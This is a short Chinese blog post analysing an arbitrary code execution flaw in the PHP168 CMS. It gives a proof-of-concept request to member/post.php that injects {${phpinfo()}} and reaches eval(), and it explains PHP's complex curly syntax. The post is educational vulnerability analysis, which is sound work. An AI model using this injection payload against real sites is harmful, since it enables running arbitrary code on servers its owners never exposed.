今天了解了php 168的任意代码执行漏洞,Poc:

http://192.168.6.128/pentest/cms/php168/member/post.php
?only=1
&showHtml_Type[bencandy][1]={${phpinfo()}}
&aid=1
&job=endHTML

通过代码审计得知,最后会执行

eval("\$array[showurl]=\"$filename_b\";");

而$filename_b最终值为**{${phpinfo()}}**

关于{${}}这种形式涉及到了php Complex (curly) syntax,

通过上图得知,

eval("\$array[showurl]=\"$filename_b\";");

实际上就是执行了phpinfo();

不理解的童鞋,可以去

https://www.php.net/manual/zh/language.types.string.php自行查阅,

另外,除了字符串之外,{${}}还有别的用法,可以创建一个新的变量,

https://stackoverflow.com/questions/14238120/purpose-of-complex-curly-syntax-outside-a-string-representation

欢迎评论区指导与批评。

转载于:https://www.cnblogs.com/danku/p/10778306.html

php 168任意代码执行漏洞之php的Complex (curly) syntax相关推荐

  1. HP officejet、PageWide打印机任意代码执行漏洞cve-2017-2741 Tenable发布漏洞检测插件...

    打印机无处不在.在企业,在家里,在学校,但你在做网络安全评估的时候是否考虑过他们?你上一次更新打印机固件是什么时候?您是否知道您的打印机有公共漏洞?Tenable安全公司进行了研究,并发布了漏洞检测  ...

  2. thinkphp日志泄漏漏洞_ThinkPHP框架任意代码执行漏洞的利用及其修复方法

    ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的.最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2 ...

  3. 基于qtc++设计文本编辑器的代码_文本编辑器Vim/Neovim被曝任意代码执行漏洞,Notepad:兄弟等你好久了...

    犹记前些日子,微软的记事本文本编辑器爆出了本地代码执行漏洞. Google Project Zero研究员Tavis Ormandy宣布在微软的记事本文本编辑器中发现代码执行漏洞. 可以看见,他在no ...

  4. Apple任意代码执行漏洞

    报告编号:B6-2021-072701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-27 0x01 漏洞简述 2021年07月27日,360CERT监测发现Apple ...

  5. 记一次海洋cms任意代码执行漏洞拿shell(url一句话)

    实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...

  6. Apache Log4j任意代码执行漏洞安全风险通告第三次更新

    奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 风险通告 近日,奇安信CERT监测到Apache Log4j存在任意代码执行漏洞.经过分析,该组件存在Java JNDI注入 ...

  7. Nette框架未授权任意代码执行漏洞分析

    Nette框架未授权任意代码执行漏洞分析 漏洞介绍: Nette Framework 是个强大,基于组件的事件驱动 PHP 框架,用来创建 web 应用.Nette Framework 是个现代化风格 ...

  8. 文本编辑器Vim/Neovim被曝任意代码执行漏洞,Notepad:兄弟等你好久了

    犹记前些日子,微软的记事本文本编辑器爆出了本地代码执行漏洞. Google Project Zero研究员Tavis Ormandy宣布在微软的记事本文本编辑器中发现代码执行漏洞. 可以看见,他在no ...

  9. 绿盟科技网络安全威胁周报2017.11 关注Apache Struts2 任意代码执行漏洞 CVE-2017-5638...

    绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-11,绿盟科技漏洞库本周新增136条,其中高危63条.本次周报建议大家关注 Apache Struts2 任意代码执行漏洞 CVE-2017- ...

最新文章

  1. php ile_get_contents无法请求https连接的解决方法
  2. pycharm中R工具包的安装
  3. 记录:自制的小说推荐程序(一)
  4. linux小白-基础命令-ls
  5. 私有云和公有云的区别_如何理解公有云和私有云
  6. 第十天-linux命令及基础手把手实战
  7. visio2013跨线问题
  8. 如何解决网页中console的显示内容出现undefined和null_如何优雅地处理前端异常?...
  9. 论述计算机与外设的访问控制方法,试论述计算机与外设访问控制的方法有多少种各有什么优缺点...
  10. python中print不显示结果_Python中的print()函数
  11. linux基础命令介绍十三:启动流程
  12. Ubuntu老是提示系统内存空间不足---扩展内存方法
  13. PADS VX2.8 正负片的概念以及设置方法
  14. python中的MRO
  15. 网站机房:DDOS防火墙在企业机房中的应用介绍
  16. 三大移动终端操作系统比较
  17. Micro-personnel部署
  18. spring boot 三种类型事物实现说明
  19. 商城订单中心实现及用户关单实现思路
  20. 京东网站具有的服务器,【京东后台服务器开发面试】问的都是比较基础,但个人准备不够充分-看准网...

热门文章

  1. linux常用命令:系统目录说明及命令ls,cp,touch,history,gparted分区
  2. Python Django模板页面过滤器使用示例
  3. 请解释一下TreeMap
  4. nginx全局内存缓存
  5. 7 自动开启网卡_从Qlogic发展历程看与RDMA网卡的关系
  6. C++设计模式--模板方法模式
  7. 多项式输出-Java
  8. 机器人学一些概念2——四元数,D-H 参数
  9. 设计模式的理解: 职责链模式 (Chain of Responsibility)
  10. java动态创建bean的意义_java相关:Spring Boot如何动态创建Bean示例代码